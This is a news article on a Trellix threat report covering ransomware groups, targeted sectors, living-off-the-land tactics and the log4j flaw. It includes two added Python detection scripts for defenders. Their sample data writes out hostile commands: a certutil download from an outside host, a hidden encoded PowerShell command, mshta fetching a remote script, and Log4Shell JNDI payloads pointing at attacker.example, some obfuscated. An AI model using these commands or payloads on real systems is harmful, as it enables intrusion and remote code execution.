Trellix: 3 Sectors Most Heavily Hit with Ransomware Activity
This year will be every bit as busy as last year when it comes to cyberattacks.
Trellix saw the DarkSide ransomware group resurface under the name BlackMatter, despite DarkSide's claim to have stopped operating, Raj Samani said.
“In using many of the same modus operandi that DarkSide used in the Colonial Pipeline attack, BlackMatter continued to leverage the double extortion approach, threatening to reveal data of victims unless a ransom is paid,” he said. “Notably we are also seeing new groups pop up — maybe not new groups, but certainly new variants. Most recently we have been tracking BlackCat, which is a capable threat group leveraging triple extortion tactics. These groups are finding new ways to extort more money from victims.”
REvil/Sodinokibi claimed responsibility for infecting more than 1 million users through a ransomware attack on Kaseya VSA. REvil's reported ransom demand of $70 million was the largest publicly known ransom amount to date. The attack forced hundreds of supermarket stores to close for several days.
LockBit 2.0 surfaced in July 2021 and eventually listed more than 200 victims on its data-leak site.
North America recorded the most incidents among continents, but saw a 12% decrease from the second quarter to the third quarter. The United States experienced the most reported incidents in the third quarter, but incidents decreased 9% from the second quarter.
France recorded the highest increase (400%) in incidents reported in the third quarter. Meanwhile, Russia experienced the largest decrease (-79%) in third-quarter incidents compared to the second quarter.
The financial, utilities and retail sectors accounted for nearly 60% of ransomware detections. Health care followed at 17% and public sector at 15%. Notable sector increases from the second to the third quarter include finance/insurance (21%) and health care (7%).
“We have to consider this is based on what we are seeing, and there are likely many more unreported attacks happening,” Samani said. “However, across the board, it should come as no surprise attackers are making a lot of money through digital crime across all sectors.”
Malware was the technique used most often in reported incidents during the third quarter, but reported malware incidents decreased 24% compared to the second quarter.
Techniques that increased from the second to the third quarter include distributed denial of service (DDoS) attacks, up 112%, and targeted attacks, up 55%.
Cybercriminals are "living off the land," using legitimate software and functions already in a system to perform malicious actions on that system. Based on third-quarter events, Trellix identified a trend in the tools used by adversaries trying to remain undetected. While state-sponsored threat groups and larger criminal groups have the resources to develop tools in house, many instead turn to binaries and administrator-installed software already present on a target system to carry out distinct phases of an attack.
Adversaries may gather information on technologies used from job postings, customer testimonials advertised by vendors, or from an inside accomplice.
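Because the binaries involved are legitimate and often needed by administrators, blocking them outright is rarely an option; detection has to key on how they are invoked. The following is an added example written for this page, not code or a rule set from Trellix or from the article. It triages constructed process-creation events against a handful of argument patterns. The binary names, the patterns and the sample command lines (including the encoded PowerShell blob and the 203.0.113.10 host) are the editor's illustrative assumptions, not findings from the report.

```python
import re

# Constructed process-creation events for illustration (not data from the Trellix report).
# Every image is a legitimate Windows binary; only the argument pattern separates routine
# administration (events 2, 4, 7) from attacker use (events 1, 3, 5, 6).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/payload.bin C:\Users\Public\p.bin"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\server.cer"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\x.dll,Start"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.10/a.hta"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

# (binary name, argument pattern, description). The binaries and patterns are the editor's
# illustrative picks of commonly abused built-ins, not a list taken from the report.
RULES = [
    ("certutil.exe", re.compile(r"-(urlcache|decode|encode)\b", re.I),
     "certutil used to download or decode a file"),
    ("powershell.exe",
     re.compile(r"-e(nc(odedcommand)?)?\b|downloadstring|frombase64string|invoke-expression|\biex\b", re.I),
     "powershell with encoded or download-and-execute arguments"),
    ("rundll32.exe", re.compile(r"\\(users|programdata|temp)\\", re.I),
     "rundll32 loading a DLL from a user-writable path"),
    ("mshta.exe", re.compile(r"https?://|javascript:|vbscript:", re.I),
     "mshta executing remote or inline script"),
    ("bitsadmin.exe", re.compile(r"/transfer\b", re.I),
     "bitsadmin used as a downloader"),
]


def _basename(path):
    """Last path component, lower-cased, accepting either separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def evaluate(event):
    """Return the descriptions of every rule the event trips (empty list if none)."""
    name = _basename(event["image"])
    return [desc for binary, pattern, desc in RULES
            if name == binary and pattern.search(event["cmdline"])]


def triage(events):
    """Return (event_number, [descriptions]) for every event that trips a rule."""
    results = []
    for number, event in enumerate(events, start=1):
        hits = evaluate(event)
        if hits:
            results.append((number, hits))
    return results


if __name__ == "__main__":
    for number, hits in triage(SAMPLE_EVENTS):
        print(f"event {number}: {'; '.join(hits)}")
```

Rules of this kind only work when they are tuned against a baseline of what administrators in the environment actually run; an untuned rule on a binary such as PowerShell will drown analysts in benign hits, which is exactly the noise that living-off-the-land tradecraft relies on.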
Samani said the upside of the report is “we are seeing these attacks, and are stopping them.”
“The report is as much of a state of the cybercrime ecosystem, but also is a reflection of what we are observing, blocking and analyzing,” he said.
In terms of cyber defense, there is a lot of information to decode, Samani said. However, fundamentally the first step is to understand the tactics of threat actors and implement measures to stop these approaches from being successful.
“For example if there is a concern about ransomware, consider the initial entry vectors and put in measures to ensure they are not vulnerable,” he said.
There’s no reason to think 2022 won’t be every bit as busy as 2021 when it comes to cyberattacks, Samani said.
“It will be a busy year,” he said. “This year we rolled out from log4j, straight into pseudo ransomware attacks. If January is anything to go by, this year will bring many more critical events to address.”
In a pseudo ransomware attack, the intrusion looks like ransomware and even delivers a ransom note. However, the malware is designed to render targeted devices inoperable rather than to collect a ransom.
Cybercriminals are most heavily targeting the financial, utilities and retail sectors with ransomware activity, according to a new Trellix report.
This week, Trellix released its first major research report. The Advanced Threat Research Report examines the most noteworthy cybercriminal activity in the third quarter of 2021.
Last month, McAfee Enterprise and FireEye emerged as a new company under the name Trellix. The company focuses on extended detection and response (XDR).
In the third quarter, high-profile ransomware groups disappeared, reappeared, reinvented and even attempted to rebrand. They remained relevant and prevalent as a popular and potentially devastating threat against an increasing variety of sectors.
Ransomware activity was denounced and banned from numerous cybercriminal forums during the second quarter. However, Trellix observed activity among the same threat actors on several forums using alternate personas.
Raj Samani is chief scientist and fellow at Trellix.
“Beyond the statistics, we covered some of the biggest risks facing organizations, and one of the biggest challenges was the log4j issue,” he said. “The impact and reliance this had was perhaps the most concerning for all of us.”
In December, researchers disclosed a zero-day vulnerability in log4j, the popular Java logging library. It allows remote code execution (RCE) when the library logs a specially crafted string. Since then, additional attack vectors have been discovered.
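The crafted string behind the log4j issue (Log4Shell, CVE-2021-44228) is a JNDI lookup expression of the form ${jndi:...}; when the vulnerable library expands it, the process fetches and executes attacker-supplied content. The following is an added example written for this page, not code from Trellix or from the article. It scans constructed web-server log lines for that expression, first peeling off the URL encoding and nested lookup wrappers (${lower:...}, ${upper:...}, ${...:-x}) that attackers used to slip past naive string matches. The log lines, the host attacker.example and the addresses are constructed for the example.

```python
import re
import urllib.parse

# Constructed web-server log lines for illustration (not data from the Trellix report).
# Lines 2-4 carry a JNDI lookup in the User-Agent or query string, each obfuscated
# differently; line 5 carries a non-JNDI lookup; line 1 is benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /help?topic=${env:HOME} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# ${lower:x} and ${upper:x} resolve to x; ${anything:-x} resolves to the default value x.
_CASE_WRAP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VAL = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{[^{}]*:[^{}]*\}")


def normalize(text, rounds=5):
    """Peel off URL encoding and nested lookup wrappers until the text stops changing."""
    prev = None
    for _ in range(rounds):
        if text == prev:
            break
        prev = text
        text = urllib.parse.unquote(text)
        text = _CASE_WRAP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VAL.sub(lambda m: m.group(1), text)
    return text


def classify(line):
    """Return 'jndi-lookup', 'other-lookup', or None for one log line."""
    norm = normalize(line)
    if JNDI_LOOKUP.search(norm):
        return "jndi-lookup"
    if ANY_LOOKUP.search(norm):
        return "other-lookup"
    return None


def scan(lines):
    """Return (line_number, verdict) for every line that carries a lookup expression."""
    findings = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            findings.append((number, verdict))
    return findings


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOGS):
        print(f"line {number}: {verdict}")
```

A match shows that a lookup was attempted against the host, not that it succeeded; confirming exploitation means checking whether the Java process made outbound LDAP or RMI connections to the referenced host around that time. Any lookup expression arriving in an HTTP field, JNDI or not, is worth a look, because an attacker probing for the bug will often start with harmless ones.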
Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn.